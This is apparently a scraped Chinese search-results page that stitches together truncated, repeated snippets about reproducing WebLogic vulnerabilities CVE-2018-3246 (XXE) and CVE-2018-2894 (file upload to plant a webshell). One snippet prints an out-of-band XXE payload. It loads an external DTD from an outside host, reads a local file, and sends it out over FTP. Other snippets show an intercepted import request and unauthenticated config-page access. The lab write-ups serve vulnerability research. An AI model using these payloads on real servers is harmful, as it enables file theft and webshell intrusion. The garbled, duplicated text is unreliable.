前几天空间被CVE-2018-2894刷屏,大家也都在研究和复现这个漏洞,正好我们安全团队也在玩这个漏洞,那大家就一起来玩咯。 本次的重点是复现,上传webshell,环境是内部一个测试环境,当我使用其中一个上传页面的时候,脑子突然热了一下,把文件后缀改成了.xml,结果就很6了。 地址如下:http://127.0.0.1:8338/ws_utc
部署和管理之中。 2018年10月17日,Oracle官方发布了10月份的安全补丁[2],其中修复了一个 Web服务测试组件的XXE漏洞(CVE-2018-3246)。 2018年10月29日,Seebug平台收录了该漏洞[3], 知道创宇404漏洞应急团队开始对该漏洞进行漏洞应急。 1.2 影响版本 WebLogic 12.1.3.0 WebLogic 12.2.1.3 1.3 漏洞利用条件 Web ...
cve-2018-3246 切换时间排序 精选看我如何在Weblogic里捡一个XXE(CVE-2018-3246) 原创 漏洞本次的重点是复现,上传webshell,环境是内部一个测试环境,当我使用其中一个上传页面的时候,脑子突然热了一下,把文件后缀改成了.xml,... 小平哥_life 1176908围观 · 12收藏 2018-10-25...
CVE-2018-3246 weblogic xxe 使用P牛2018-2894的容器 http://192.168.245.130:7001/ws_utc/begin.do 导入测试用例 上传时抓取数据包 POST /ws_utc/resources/ws/config/import?timestamp=1566895391388 HTTP/1.1Host: 192.168.245.130:7001Content-Length: 215Cache-Control: max-age=0Origin: http://192.168.245....
weblogic之CVE-2018-3246 XXE分析 通过ftp通道将数据传出来。上传1.xml <!DOCTYPExmlrootname[<!ENTITY %aaaSYSTEM"http://192.168.172.128:1234/ext.dtd"><!ENTITY %bbbSYSTEM"file:///E:///1.txt">%aaa;%ccc;%ddd;]> ext.dtd内容如下 <!ENTITY %ccc"<!ENTITY % ddd SYSTEM 'ftp://fakeuser:@...
前几天空间被CVE-2018-2894刷屏,大家也都在研究和复现这个漏洞,正好我们安全团队也在玩这个漏洞,那大家就一起来玩咯。 本次的重点是复现,上传webshell,环境是内部一个测试环境,当我使用其中一个上传页面的时候,脑子突然热了一下,把文件后缀改成了.xml,结果就很6了。
CVE-2018-2894 Weblogic 任意文件上传漏洞 漏洞搭建 这里使用vulfocus进行复现。 访问http://192.168.146.167:22911/console/login/LoginForm.jsp,搭建成功。 漏洞复现 访问http://192.168.146.167:22911/ws_utc/login.do,发现需要登录,作罢。 访问http://192.168.146.167:22911/ws_utc/config.do,发现不需要登录,从...
前几天空间被CVE-2018-2894刷屏,大家也都在研究和复现这个漏洞,正好我们安全团队也在玩这个漏洞,那大家就一起来玩咯。 本次的重点是复现,上传webshell,环境是内部一个测试环境,当我使用其中一个上传页面的时候,脑子突然热了一下,把文件后缀改成了.xml,结果就很6了。
前几天空间被CVE-2018-2894刷屏,大家也都在研究和复现这个漏洞,正好我们安全团队也在玩这个漏洞,那大家就一起来玩咯。 本次的重点是复现,上传webshell,环境是内部一个测试环境,当我使用其中一个上传页面的时候,脑子突然热了一下,把文件后缀改成了.xml,结果就很6了。